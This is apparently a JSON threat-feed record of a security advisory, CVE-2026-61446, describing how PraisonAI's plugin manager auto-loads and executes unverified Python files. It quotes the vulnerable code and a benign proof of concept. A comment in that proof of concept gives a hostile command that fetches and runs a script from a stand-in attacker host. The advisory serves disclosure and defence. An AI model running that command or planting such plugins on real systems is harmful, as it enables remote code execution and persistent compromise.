{"success":true,"data":{"threats":[{"id":"8c945dde-29e2-48c5-83c9-680b10457bb1","slug":"cve-2026-61446","externalId":"GHSA-m6wp-h223-4c8g","source":"OSV","sourceType":"ghsa","type":"vulnerability","title":"PraisonAI: Plugin Auto-Discovery Executes Arbitrary Python Files Without Verification","description":"### Summary\nThe plugin manager loads and executes arbitrary `.py` files from `.praisonai/plugins/` directories (both project-level and user home) via `importlib.util.spec_from_file_location()` + `exec_module()` with zero code signing, integrity verification, or sandboxing. Any attacker who can write a file to the plugins directory (via path traversal, supply chain attack, or compromised dependency) achieves arbitrary code execution when the plugin system initializes.\n\n### Details\n\n`src/praisonai-agents/praisonaiagents/plugins/manager.py` (lines 163-196):\n\n```python\ndef _load_plugin_file(self, file_path: Path) -> Optional[Plugin]:\n    module_name = f\"praison_plugin_{file_path.stem}_{id(file_path)}\"\n    spec = importlib.util.spec_from_file_location(module_name, file_path)\n    module = importlib.util.module_from_spec(spec)\n    sys.modules[module_name] = module\n    spec.loader.exec_module(module)  # Executes arbitrary Python code\n\n    if hasattr(module, \"create_plugin\"):\n        return module.create_plugin()  # Calls arbitrary function\n```\n\n`src/praisonai-agents/praisonaiagents/plugins/discovery.py` (lines 38-39):\n\n```python\n# Auto-discovery paths:\n# 1. Project: ./.praisonai/plugins/\n# 2. User: ~/.praisonai/plugins/\n```\n\nNo code signing, hash verification, or sandboxing is applied. The only validation is checking for a `Plugin Name` field in the file's docstring header.\n\n\n### PoC\n\n```python\nfrom praisonaiagents.plugins.discovery import load_plugin\nimport tempfile, os\n\n# Create a \"malicious\" plugin\ntest_dir = tempfile.mkdtemp()\nplugin_file = os.path.join(test_dir, 'evil.py')\nwith open(plugin_file, 'w') as f:\n    f.write('\"\"\"\\nPlugin Name: Evil Plugin\\nDescription: test\\nVersion: 1.0.0\\n\"\"\"\\n'\n            'PROOF = \"CODE_EXECUTED_AT_IMPORT_TIME\"\\n'\n            '# In a real attack: os.system(\"curl attacker.com/shell.sh | bash\")\\n'\n            'def create_plugin():\\n    return {\"name\": \"evil\"}\\n')\n\n# Load it\nresult = load_plugin(plugin_file)\nprint(f\"Result: {result}\")  # {'name': 'Evil Plugin', ...}\n\n# Verify code executed\nimport sys\nfor name, mod in sys.modules.items():\n    if 'evil' in name:\n        print(f\"EXPLOIT CONFIRMED: {mod.PROOF}\")  # \"CODE_EXECUTED_AT_IMPORT_TIME\"\n```\n\n**Tested result:** Plugin file was loaded via `exec_module()`, and the `PROOF` variable confirmed code execution at import time.\n\n### Impact\n\n- **Arbitrary code execution**: Any `.py` file in the plugins directory is executed with full Python access\n- **No user interaction required**: Plugins are auto-discovered and loaded at framework initialization\n- **Persistence**: A planted plugin survives restarts and executes every time the framework starts\n- **Attack chain**: Combine with path traversal (write_file tool) to plant the plugin remotely","cveId":"CVE-2026-61446","cvssScore":null,"cvssVector":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","severity":"high","vendor":"PyPI","product":"praisonaiagents","affectedVersions":["pkg:pypi/praisonaiagents < 1.6.78"],"cwes":["CWE-427","CWE-94"],"tags":["osv","osv:ghsa-m6wp-h223-4c8g","ecosystem:pypi"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://osv.dev/vulnerability/GHSA-m6wp-h223-4c8g","type":"advisory","title":"OSV GHSA-m6wp-h223-4c8g"},{"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-m6wp-h223-4c8g","type":"other","title":"OSV web"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-61446","type":"advisory","title":"OSV advisory"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-62165","type":"advisory","title":"OSV advisory"},{"url":"https://github.com/MervinPraison/PraisonAI","type":"vendor","title":"OSV package"},{"url":"https://www.vulncheck.com/advisories/praisonai-before-remote-code-execution-via-plugin-auto-discovery","type":"other","title":"OSV web"}],"epssScore":0.00325,"epssPercentile":0.23556,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-08T16:44:04.000Z","addedAt":"2026-10-08T18:42:42.574Z","updatedAt":"2026-10-08T18:42:42.574Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-61446","note":"may still be awaiting NVD analysis"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-61446","note":"authoritative record"},{"label":"GitHub Advisory","url":"https://github.com/advisories/GHSA-m6wp-h223-4c8g"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-m6wp-h223-4c8g"}]}],"pagination":{"page":1,"limit":20,"total":1,"totalPages":1,"hasNext":false,"hasPrev":false}},"meta":{"apiVersion":"v1","requestedAt":"2026-10-09T01:18:52.592Z","durationMs":31,"filters":{"search":null,"severity":[],"type":[],"country":[],"tag":["osv:ghsa-m6wp-h223-4c8g"],"cwe":[],"vendor":null,"product":null,"cve":null,"source":[],"days":null,"publishedAfter":null,"publishedBefore":null,"minCvss":null,"maxCvss":null,"minEpss":null,"knownExploited":null,"hasPatch":null,"hasNucleiTemplate":null},"sort":"newest","unknownParams":[],"warnings":[]}}